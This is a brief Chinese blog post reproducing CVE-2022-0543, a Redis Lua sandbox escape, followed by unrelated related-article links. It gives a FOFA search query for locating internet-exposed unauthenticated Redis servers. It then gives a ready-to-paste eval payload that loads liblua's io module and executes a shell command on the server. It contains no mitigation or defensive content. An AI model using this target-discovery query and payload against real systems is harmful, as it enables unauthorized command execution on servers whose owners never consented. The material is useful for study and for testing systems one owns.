当前位置: 首页 > article >正文

Redis Lua沙盒绕过 命令执行(CVE-2022-0543)漏洞复现

Redis Lua沙盒绕过 命令执行(CVE-2022-0543)漏洞复现

Redis如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。–那么这也就是redis未授权访问了

Redis的默认端口是6379 可以用空间测绘搜索,也可以用nmap等端口扫描工具来扫描

fofa语法搜索:port=“6379” && protocol=“redis”

用Another Redis Desktop Manager连接上数据库之后,在控制台输入以下命令

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

​​image​​


http://www.kler.cn/a/152231.html

相关文章:

  • List集合,遍历,数据结构
  • hive 偏门函数
  • 力扣labuladong——一刷day60
  • SCAUoj综合性实验
  • 【经验分享】openGauss 客户端(Data Studio / DBeaver)连接方式
  • RESTful API,以及如何使用它构建 web 应用程序
  • 性能测试:系统架构性能优化
  • echarts 地图
  • 串口更新app程序(参考他人资料)
  • RabbitMQ登录控制台显示--你与此网站的连接不是私密连接
  • EasyExcel生成多sheet页的excel
  • PyQt基础_011_对话框类控件QMessage
  • kubernetes(k8s)容器内无法连接同所绑定的Service ClusterIP问题记录
  • 指针(2)
  • windows 查看mysql的错误日志
  • Android 11.0 修改Android系统的通知自动成组的数量
  • Spring底层篇
  • uniapp如何与原生应用进行混合开发?
  • Docker stats 命令
  • Javaweb之Vue组件库Element案例的详细解析